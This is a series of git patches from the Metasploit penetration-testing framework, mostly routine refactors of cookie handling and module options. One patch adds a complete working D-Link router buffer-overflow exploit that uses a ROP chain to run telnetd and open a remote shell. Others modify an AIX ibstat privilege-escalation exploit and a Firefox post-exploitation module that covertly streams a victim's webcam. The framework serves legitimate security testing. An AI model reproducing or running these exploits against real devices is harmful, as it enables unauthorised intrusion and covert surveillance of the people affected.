b/modules/auxiliary/gather/ibm_sametime_version.rb @@ -70,6 +70,11 @@ class Metasploit3 < Msf::Auxiliary [ 'kicks4kittens' # Metasploit module ], + 'References' => + [ + [ 'CVE', '2013-3982' ], + [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201'] + ], 'DefaultOptions' => { 'SSL' => true From 1dbe972377f830db390d4a41e913c64b8a96d61b Mon Sep 17 00:00:00 2001 From: sinn3r <wei_chen@rapid7.com> Date: Thu, 22 May 2014 12:18:49 -0500 Subject: [PATCH 359/853] Fix URIPATH / for BrowserExploitServer [SeeRM #8804] Fix URIPATH / for BrowserExploitServer --- lib/msf/core/exploit/remote/browser_exploit_server.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index d1782616e1..6cd891aa84 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb @@ -439,7 +439,7 @@ module Msf # def on_request_uri(cli, request) case request.uri - when get_resource.chomp("/") + when '/', get_resource.chomp("/") # # This is the information gathering stage # From 28459299b205934897294a235f951e700a89dece Mon Sep 17 00:00:00 2001 From: mercd <mercd@users.noreply.github.com> Date: Thu, 22 May 2014 14:16:04 -0700 Subject: [PATCH 360/853] Update ibstat_path.rb Add interface detection, defaulting to en0. --- modules/exploits/aix/local/ibstat_path.rb | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/modules/exploits/aix/local/ibstat_path.rb b/modules/exploits/aix/local/ibstat_path.rb index cb424c1cfe..1ac45dfa97 100644 --- a/modules/exploits/aix/local/ibstat_path.rb +++ b/modules/exploits/aix/local/ibstat_path.rb @@ -110,8 +110,22 @@ chmod 4555 #{root_file} cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH") cmd_exec("export PATH") + print_status("Finding interface name...") + iface = "" + cmd_exec("lsdev -Cc if").each_line do |line| + if line.match(/^[a-z]+[0-9]+\s+Available/) and not line.match(/^lo[0-9]/) + iface = line.split(/\s+/)[0] + print_status("Found interface #{iface}.") + break + end + end + if iface == "" + iface = "en0" + print_status("Found no interface, defaulting to en0.") + end + print_status("Triggering vulnerablity...") - cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null") + cmd_exec("/usr/bin/ibstat -a -i #{iface} 2>/dev/null >/dev/null") # The $PATH variable must be restored before the payload is executed # in cases where an euid root shell was gained From ae3c334232e46bc3780ca507a0c10a7e255b0c1f Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Thu, 22 May 2014 17:14:35 -0500 Subject: [PATCH 361/853] Getting closer. Still something f'd with local answerer.html. --- lib/msf/core/post/webrtc.rb | 6 ++-- modules/post/firefox/gather/webcam_chat.rb | 36 ++++++++++++---------- 2 files changed, 23 insertions(+), 19 deletions(-) diff --git a/lib/msf/core/post/webrtc.rb b/lib/msf/core/post/webrtc.rb index d58c1ecf91..342bd2e737 100644 --- a/lib/msf/core/post/webrtc.rb +++ b/lib/msf/core/post/webrtc.rb @@ -12,18 +12,18 @@ module Msf::Post::WebRTC interface = load_interface('answerer.html') api = load_api_code - tmp_api = Tempfile.new('api.js') + tmp_api = Tempfile.new(['api', '.js']) tmp_api.binmode tmp_api.write(api) tmp_api.close interface = interface.gsub(/\=SERVER\=/, server) - interface = interface.gsub(/\=WEBRTCAPIJS\=/, tmp_api.path) + interface = interface.gsub(/\=WEBRTCAPIJS\=/, File.basename(tmp_api.path)) interface = interface.gsub(/\=RHOST\=/, rhost) interface = interface.gsub(/\=CHANNEL\=/, channel) interface = interface.gsub(/\=OFFERERID\=/, offerer_id) - tmp_interface = Tempfile.new('answerer.html') + tmp_interface = Tempfile.new(['answerer', '.html']) tmp_interface.binmode tmp_interface.write(interface) tmp_interface.close diff --git a/modules/post/firefox/gather/webcam_chat.rb b/modules/post/firefox/gather/webcam_chat.rb index ee4450bde7..6871e66997 100644 --- a/modules/post/firefox/gather/webcam_chat.rb +++ b/modules/post/firefox/gather/webcam_chat.rb @@ -36,9 +36,15 @@ class Metasploit3 < Msf::Post result = js_exec(js_payload(server, offerer_id, channel)) - if result.present? - print_status result - connect_video_chat(server, channel, offerer_id) + if datastore['CLOSE'] + print_status "Stream closed." + else + if result.present? + print_status result + connect_video_chat(server, channel, offerer_id) + else + print_warning "No response received" + end end end @@ -63,23 +69,21 @@ class Metasploit3 < Msf::Post end %Q| - (function(send){ - try { - var b64 = Components.utils.import("resource://gre/modules/Services.jsm").atob; - var AppShellService = Components - .classes["@mozilla.org/appshell/appShellService;1"] - .getService(Components.interfaces.nsIAppShellService); + (function(send){ + try { + var AppShellService = Components + .classes["@mozilla.org/appshell/appShellService;1"] + .getService(Components.interfaces.nsIAppShellService); - var html = "#{Rex::Text.encode_base64(interface)}"; - var url = "data:text/html;base64,"+html; - AppShellService.hiddenDOMWindow.open(url, "_self"); - AppShellService.hiddenDOMWindow.moveTo(-55555,-55555); - send("Streaming webcam..."); - } catch (e) { + var html = "#{Rex::Text.encode_base64(interface)}"; + var url = #{url}; + var win = AppShellService.hiddenDOMWindow.open(url, "_self", "width=500,height=500"); + send("Streaming webcam..."); + } catch (e) { send(e); } })(send); - |.gsub(/\s+/, '') + | end end From b85c0b75430ef8a48e5144761f8c8a61e295f76f Mon Sep 17 00:00:00 2001 From: Michael Messner <devnull@s3cur1ty.de> Date: Fri, 23 May 2014 20:51:25 +0200 Subject: [PATCH 362/853] rop to system with telnetd --- .../http/dlink_authentication_rop_system.rb | 125 ++++++++++++++++++ 1 file changed, 125 insertions(+) create mode 100644 modules/exploits/linux/http/dlink_authentication_rop_system.rb diff --git a/modules/exploits/linux/http/dlink_authentication_rop_system.rb b/modules/exploits/linux/http/dlink_authentication_rop_system.rb new file mode 100644 index 0000000000..7f73816900 --- /dev/null +++ b/modules/exploits/linux/http/dlink_authentication_rop_system.rb @@ -0,0 +1,125 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ManualRanking # the exploit as it is is excellent but we can only start the telnetd and connect to it + + HttpFingerprint = { :pattern => [ /Linux,\ HTTP\/1.0,\ DIR-/ ] } + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link authentication.cgi Buffer Overflow', + 'Description' => %q{ + This module exploits an anonymous remote code execution vulnerability on different D-Link routers. + This module has been tested successfully on D-Link DIR645A1_FW103B11. Different other devices like the + DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable and they were tested within an emulated + environment. They are a little bit different in the first ROP gadget. + }, + 'Author' => + [ + 'Roberto Paleari', # Vulnerability discovery + 'Craig Heffner', # also discovered the vulnerability / help with some parts of this module + 'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module and verification on different other routers + ], + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { 'PAYLOAD' => 'generic/shell_bind_tcp' }, + 'References' => + [ + [ 'OSVDB', '95951' ], + [ 'EDB', '27283' ], + [ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008' ], #advisory on vendor web site + [ 'URL', 'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000' ], #vendor web site of router + [ 'URL', 'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt' ] #original advisory + ], + 'Targets' => + [ + [ 'DLink DIR-645 1.03 - start telnetd', + { + 'Offset' => 1011, + 'LibcBase' => 0x2aaf8000, #Router + #'LibcBase' => 0x40854000, # QEMU environment + 'System' => 0x000531FF, # address of system + 'CalcSystem' => 0x000158C8, # calculate the correct address of system + 'CallSystem' => 0x000159CC, # call our system + } + ] + ], + 'DisclosureDate' => 'Feb 08 2013', + 'DefaultTarget' => 0)) + end + + def check + begin + res = send_request_cgi({ + 'uri' => "/authentication.cgi", + 'method' => 'GET' + }) + + if res && [200, 301, 302].include?(res.code) + return Exploit::CheckCode::Detected + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + + Exploit::CheckCode::Unknown + end + + def exploit + lport = datastore['LPORT'] + cmd = "/usr/sbin/telnetd -p #{lport}" + + print_status("#{peer} - Trying to access the vulnerable URL...") + + unless check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") + end + + # prepare our shellcode that triggers the crash: + shellcode = rand_text_alpha_upper(target['Offset']) # padding + shellcode << [target['LibcBase'] + target['System']].pack("V") # s0 - address of system + shellcode << rand_text_alpha_upper(16) # unused reg $s1 - $s4 + shellcode << [target['LibcBase'] + target['CallSystem']].pack("V") # s5 - second gadget (call system) + + # .text:000159CC 10 00 B5 27 addiu $s5, $sp, 0x170+var_160 # get the address of our command into $s5 + # .text:000159D0 21 28 60 02 move $a1, $s3 # not used + # .text:000159D4 21 30 20 02 move $a2, $s1 # not used + # .text:000159D8 21 C8 00 02 move $t9, $s0 # $s0 - system + # .text:000159DC 09 F8 20 03 jalr $t9 # call system + # .text:000159E0 21 20 A0 02 move $a0, $s5 # our cmd -> into a0 as parameter for system + + shellcode << rand_text_alpha_upper(12) # unused registers $s6 - $fp + shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V") # $ra - gadget nr 1 (prepare the parameter for system) + + # .text:000158C8 21 C8 A0 02 move $t9, $s5 # s5 - our second gadget + # .text:000158CC 09 F8 20 03 jalr $t9 # jump the second gadget + # .text:000158D0 01 00 10 26 addiu $s0, 1 # s0 our system address - lets calculate the right address + + shellcode << rand_text_alpha_upper(16) # filler in front of our command + shellcode << cmd + + # now lets rock it ... + + print_status("#{peer} - Sending exploit ...") + + res = send_request_cgi({ + 'method' => 'POST', + #'uri' => "/authentication_gdb.cgi", #for debugging on the router + 'uri' => "/authentication.cgi", + 'cookie' => "uid=test", + 'encode_params' => false, + 'vars_post' => { + 'uid' => 'test', + 'password' => 'asd' << shellcode, + } + }) + end +end From f189033e8a2dcb3355a44c3e40f4d46883a9d039 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Fri, 23 May 2014 14:51:08 -0500 Subject: [PATCH 363/853] OWA bruteforce shouldnt edit datastore (@wchen-r7) This module was written in an era where the defaults for bruteforcing included a lot of lock-inducing behavior, thus, it was quite serious about setting datastore options directly. Also, there was apparently a bug in USER_AS_PASS that this module attempted to avoid by setting the datastore directly, rather than fixing the bug directly. As far as I know, this bug has been long since resolved. --- modules/auxiliary/scanner/http/owa_login.rb | 19 ------------------- 1 file changed, 19 deletions(-) diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb index 9696f28e3f..edf003f3df 100644 --- a/modules/auxiliary/scanner/http/owa_login.rb +++ b/modules/auxiliary/scanner/http/owa_login.rb @@ -93,26 +93,7 @@ class Metasploit3 < Msf::Auxiliary deregister_options('BLANK_PASSWORDS', 'RHOSTS','PASSWORD','USERNAME') end - def cleanup - # Restore the original settings - datastore['BLANK_PASSWORDS'] = @blank_passwords_setting - datastore['USER_AS_PASS'] = @user_as_pass_setting - end - def run - # Store the original setting - @blank_passwords_setting = datastore['BLANK_PASSWORDS'] - - # OWA doesn't support blank passwords or usernames! - datastore['BLANK_PASSWORDS'] = false - - # If there's a pre-defined username/password, we need to turn off USER_AS_PASS - # so that the module won't just try username:username, and then exit. - @user_as_pass_setting = datastore['USER_AS_PASS'] - if not datastore['USERNAME'].nil? and not datastore['PASSWORD'].nil? - print_status("Disabling 'USER_AS_PASS' because you've specified an username/password") - datastore['USER_AS_PASS'] = false - end vhost = datastore['VHOST'] || datastore['RHOST'] From efffbf751ac8b05b9bc5e4d5ade02db747d1c259 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Fri, 23 May 2014 15:05:30 -0500 Subject: [PATCH 364/853] PHP module shouldnt zap CMD option (@wchen-r7) As far as I can tell, there is no purpose for this cleanup. No other CMD exec module takes pains to clear out CMD after run, and it looks like a bad idea -- what happens when you rexploit? --- modules/exploits/multi/http/phpldapadmin_query_engine.rb | 7 ------- 1 file changed, 7 deletions(-) diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index 1315ed710e..fb087c952d 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb @@ -87,13 +87,6 @@ class Metasploit3 < Msf::Exploit::Remote return res.get_cookies end - def cleanup - # We may not be using php/exe again, so clear the CMD option - if datastore['CMD'] - datastore['CMD'] = nil - end - end - def exploit # if we are using the exec CMD stager # important to check which php functions are disabled From 7f59cf5035613a3bd3e717a045f1de2f1060d632 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Fri, 23 May 2014 15:18:54 -0500 Subject: [PATCH 365/853] Ora XID HTTP needn't edit DBUSER (@cellabosm) Looks like copypasta artifacts. DBUSER and DBPASS aren't ever set as options in the module, and the module doesn't include MC's Exploit::ORACLE mixin. It's also from four years ago and doesn't report_auth or anything useful like that, but that's out of scope for this branch. --- modules/auxiliary/scanner/oracle/xdb_sid_brute.rb | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb index bee4244a5e..cac758bf01 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Auxiliary OptString.new('CSVFILE', [ false, 'The file that contains a list of default accounts.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'oracle_default_passwords.csv')]), Opt::RPORT(8080), ], self.class) - deregister_options('DBUSER','DBPASS') end def run_host(ip) @@ -57,9 +56,9 @@ class Metasploit3 < Msf::Auxiliary fd = CSV.foreach(list) do |brute| - datastore['DBUSER'] = brute[2].downcase - datastore['DBPASS'] = brute[3].downcase - user_pass = "#{datastore['DBUSER']}:#{datastore['DBPASS']}" + dbuser = brute[2].downcase + dbpass = brute[3].downcase + user_pass = "#{dbuser}:#{dbpass}" res = send_request_raw({ 'uri' => '/oradb/PUBLIC/GLOBAL_NAME', @@ -72,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary }, 10) if( not res ) - vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}...") + vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}...") next end if (res.code == 200) @@ -89,10 +88,10 @@ class Metasploit3 < Msf::Auxiliary :data => sid, :update => :unique_data ) - print_good("Discovered SID: '#{sid[0]}' for host #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}") + print_good("Discovered SID: '#{sid[0]}' for host #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}") users.push(user_pass) else - vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}...") + vprint_error("Unable to retrieve SID for #{ip}:#{datastore['RPORT']} with #{dbuser} / #{dbpass}...") end end #fd.each From f7bfab5a267b596be8f077d56605300bb3ec726d Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Fri, 23 May 2014 15:32:04 -0500 Subject: [PATCH 366/853] HTTP traversal shouldnt upcase METHOD (@wchen-r7) If the user wants to use downcased or mixed case HTTP methods, heck, more power to them. If it doesn't work, it doesn't work. No other HTTP module makes this call. --- modules/auxiliary/scanner/http/http_traversal.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index d489e7aab4..9f7a5047cb 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -336,9 +336,6 @@ class Metasploit3 < Msf::Auxiliary datastore['PATH'] = '/' + datastore['PATH'] end - # Some webservers (ie. Apache) might not like the HTTP method to be lower-case - datastore['METHOD'] = datastore['METHOD'].upcase - print_status("Running action: #{action.name}...") # And it's..... "SHOW TIME!!" From 9f78bec457f14579134bc9856a3596bf788f1084 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Fri, 23 May 2014 15:43:50 -0500 Subject: [PATCH 367/853] Use normalize_uri (@wchen-r7) Instead of editing the datastore['PATH'], use normalize_uri. Since the purpose of this module is quite fuzz-like, I didn't want to apply the normalize_uri to the whole uri -- the original code merely applied to datastore['PATH'] (which seems like it should be datastore['URI'] really) and then added on a bunch of other stuff to test for traversals. --- .../auxiliary/scanner/http/http_traversal.rb | 19 +++++++------------ 1 file changed, 7 insertions(+), 12 deletions(-) diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index 9f7a5047cb..f30e5b1697 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary 1.upto(depth) do |d| file_to_read.each do |f| trigger = base * d - p = datastore['PATH'] + trigger + f + p = normalize_uri(datastore['PATH']) + trigger + f req = ini_request(p) vprint_status("Trying: http://#{rhost}:#{rport}#{p}") res = send_request_cgi(req, 25) @@ -187,7 +187,7 @@ class Metasploit3 < Msf::Auxiliary if datastore['TRIGGER'].empty? # Found trigger using fuzz() found = true if trigger - uri = datastore['PATH'] + trigger + uri = normalize_uri(datastore['PATH']) + trigger else # Manual check. meh. if datastore['FILE'].empty? @@ -195,7 +195,7 @@ class Metasploit3 < Msf::Auxiliary return end - uri = datastore['PATH'] + trigger + datastore['FILE'] + uri = normalize_uri(datastore['PATH']) + trigger + datastore['FILE'] req = ini_request(uri) vprint_status("Trying: http://#{rhost}:#{rport}#{uri}") res = send_request_cgi(req, 25) @@ -211,7 +211,7 @@ class Metasploit3 < Msf::Auxiliary :port => rport, :vhost => datastore['VHOST'], :path => uri, - :params => datastore['PATH'], + :params => normalize_uri(datastore['PATH']), :pname => trigger, :risk => 3, :proof => trigger, @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Auxiliary # Our trigger already puts us in '/', so our filename doesn't need to begin with that f = f[1,f.length] if f =~ /^\// - req = ini_request(uri = (datastore['PATH'] + trigger + f).chop) + req = ini_request(uri = (normalize_uri(datastore['PATH']) + trigger + f).chop) res = send_request_cgi(req, 25) vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res @@ -261,7 +261,7 @@ class Metasploit3 < Msf::Auxiliary # Our trigger already puts us in '/', so our filename doesn't need to begin with that f = f[1,f.length] if f =~ /^\// - req = ini_request(uri = (datastore['PATH'] + "php://filter/read=convert.base64-encode/resource=" + f).chop) + req = ini_request(uri = (normalize_uri(datastore['PATH']) + "php://filter/read=convert.base64-encode/resource=" + f).chop) res = send_request_cgi(req, 25) vprint_status("#{res.code.to_s} for http://#{rhost}:#{rport}#{uri}") if res @@ -294,7 +294,7 @@ class Metasploit3 < Msf::Auxiliary # Form the PUT request fname = Rex::Text.rand_text_alpha(rand(5) + 5) + '.txt' - uri = datastore['PATH'] + trigger + fname + uri = normalize_uri(datastore['PATH']) + trigger + fname vprint_status("Attempt to upload to: http://#{rhost}:#{rport}#{uri}") req = ini_request(uri) @@ -331,11 +331,6 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - # Make sure datastore['PATH] begins with a '/' - if datastore['PATH'] !~ /^\// - datastore['PATH'] = '/' + datastore['PATH'] - end - print_status("Running action: #{action.name}...") # And it's..... "SHOW TIME!!" From 1aee0f3305c9849ca7483372d383048f9fd49225 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Fri, 23 May 2014 17:10:27 -0500 Subject: [PATCH 368/853] Warn if it's not UPPERCASE method (@wchen-r7) See the discussion on f7bfab5a26, PR #3386 --- modules/auxiliary/scanner/http/http_traversal.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index f30e5b1697..d7fe81ab4b 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -331,6 +331,10 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) + # Warn if it's not a well-formed UPPERCASE method + if datastore['METHOD'] !~ /^[A-Z]+$/ + print_warning("HTTP method #{datastore['METHOD']} is not Apache-compliant. Try only UPPERCASE letters.") + end print_status("Running action: #{action.name}...") # And it's..... "SHOW TIME!!" From 8d4d40b8ba5b0c5d5377895369a0173754a9dda3 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer <FireFart@gmail.com> Date: Sat, 24 May 2014 00:34:46 +0200 Subject: [PATCH 369/853] Resolved some Set-Cookie warnings --- modules/exploits/multi/http/wikka_spam_exec.rb | 11 ++++++----- modules/exploits/multi/http/zabbix_script_exec.rb | 2 +- .../exploits/multi/php/php_unserialize_zval_cookie.rb | 2 +- modules/exploits/unix/http/lifesize_room.rb | 4 ++-- modules/exploits/unix/webapp/foswiki_maketext.rb | 6 +++--- modules/exploits/unix/webapp/hastymail_exec.rb | 2 +- .../unix/webapp/invision_pboard_unserialize_exec.rb | 2 +- .../exploits/unix/webapp/joomla_media_upload_exec.rb | 4 ++-- modules/exploits/unix/webapp/nagios_graph_explorer.rb | 2 +- .../unix/webapp/openemr_sqli_privesc_upload.rb | 2 +- modules/exploits/unix/webapp/phpmyadmin_config.rb | 2 +- modules/exploits/unix/webapp/sphpblog_file_upload.rb | 4 ++-- .../exploits/unix/webapp/sugarcrm_unserialize_exec.rb | 4 ++-- modules/exploits/unix/webapp/trixbox_langchoice.rb | 4 ++-- modules/exploits/unix/webapp/twiki_maketext.rb | 6 +++--- .../exploits/unix/webapp/vbulletin_vote_sqli_exec.rb | 2 +- modules/exploits/unix/webapp/webmin_show_cgi_exec.rb | 8 ++++---- .../unix/webapp/wp_google_document_embedder_exec.rb | 6 +----- modules/exploits/unix/webapp/zpanel_username_exec.rb | 4 ++-- modules/exploits/windows/http/osb_uname_jlist.rb | 4 ++-- .../windows/http/solarwinds_storage_manager_sql.rb | 4 ++-- 21 files changed, 41 insertions(+), 44 deletions(-) diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 20d4a365d3..160a553278 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -90,8 +90,8 @@ class Metasploit3 < Msf::Exploit::Remote # Get the cookie in this format: # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka - if res and res.headers['Set-Cookie'] - cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0] + if res and res.get_cookies + cookie = res.get_cookies else fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue") end @@ -141,9 +141,10 @@ class Metasploit3 < Msf::Exploit::Remote 'vars_post' => login }) - if res and res.headers['Set-Cookie'] =~ /user_name/ - user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/)[0] || "" - pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/)[0] || "" + if res and res.get_cookies =~ /user_name/ + c = res.get_cookies + user = c.scan(/(user_name\@\w+=\w+);/)[0] || "" + pass = c.scan(/(pass\@\w+=\w+)/)[0] || "" cookie_cred = "#{cookie}; #{user}; #{pass}" else cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb index 57ec58c718..47409ba37f 100644 --- a/modules/exploits/multi/http/zabbix_script_exec.rb +++ b/modules/exploits/multi/http/zabbix_script_exec.rb @@ -88,7 +88,7 @@ class Metasploit4 < Msf::Exploit::Remote fail_with("Login failed") end - sess = login.headers['Set-Cookie'] + sess = login.get_cookies dash = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index b18a55f292..3153f03bae 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb @@ -255,7 +255,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Detect the phpBB cookie name - if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /(.*)_(sid|data)=/) + if res.get_cookies =~ /(.*)_(sid|data)=/ vprint_status("The server may require a cookie name of '#{$1}_data'") end diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index e8fef8bcbc..96d9b28600 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -56,11 +56,11 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', }, 10) - if not (res and res.headers['set-cookie']) + if res.nil? || res.get_cookies.empty? fail_with(Failure::NotFound, 'Could not obtain a Session ID') end - sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0] + sessionid = 'PHPSESSID=' << res.get_cookies.split('PHPSESSID=')[1].split('; ')[0] headers = { 'Cookie' => sessionid, diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb index a5b410086f..4701e7cb72 100644 --- a/modules/exploits/unix/webapp/foswiki_maketext.rb +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/ + if not res or res.code != 302 or res.get_cookies !~ /FOSWIKISID=([0-9a-f]*)/ vprint_status "#{res.code}\n#{res.body}" return nil end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_good("validation_key found: #{validation_key}") if session.empty? - if res.headers['Set-Cookie'] =~ /FOSWIKISID=([0-9a-f]*)/ + if res.get_cookies =~ /FOSWIKISID=([0-9a-f]*)/ session = $1 else vprint_error("Error using anonymous access") @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - if res.headers['Set-Cookie'] =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ + if res.get_cookies =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ strike_one = $1 else vprint_error("Error getting the FOSWIKISTRIKEONE value") diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index ae6cfbfe69..9fb9ac8969 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 303 - @session_id = res["Set-Cookie"] + @session_id = res.get_cookies print_good "#{peer} - Authentication successful" end end diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb index d3d21d0547..930db07be9 100644 --- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET' }) - if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/ + if res and res.code == 200 and res.get_cookies =~ /(.+)session/ print_status("#{peer} - Cookie prefix #{$1} found") cookie_prefix = $1 end diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index 9645358c82..fa6e2b56d8 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb @@ -177,7 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Checking Access to Media Component...") res = get_upload_form - if res and (res.code == 200 or res.code == 302) and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/ + if res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /You are not authorised to view this resource/ print_status("#{peer} - Authentication required... Proceeding...") if @username.empty? or @password.empty? @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Exploit::Remote if not res or res.code != 303 fail_with(Failure::NoAccess, "#{peer} - Unable to Authenticate") end - elsif res and (res.code == 200 or res.code == 302) and res.headers['Set-Cookie'] and res.body =~ /<form action="(.*)" id="uploadForm"/ + elsif res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /<form action="(.*)" id="uploadForm"/ print_status("#{peer} - Authentication isn't required.... Proceeding...") @cookies = res.get_cookies.sub(/;$/, "") else diff --git a/modules/exploits/unix/webapp/nagios_graph_explorer.rb b/modules/exploits/unix/webapp/nagios_graph_explorer.rb index 0295f0f7db..9497ece6fd 100644 --- a/modules/exploits/unix/webapp/nagios_graph_explorer.rb +++ b/modules/exploits/unix/webapp/nagios_graph_explorer.rb @@ -79,7 +79,7 @@ class Metasploit3 < 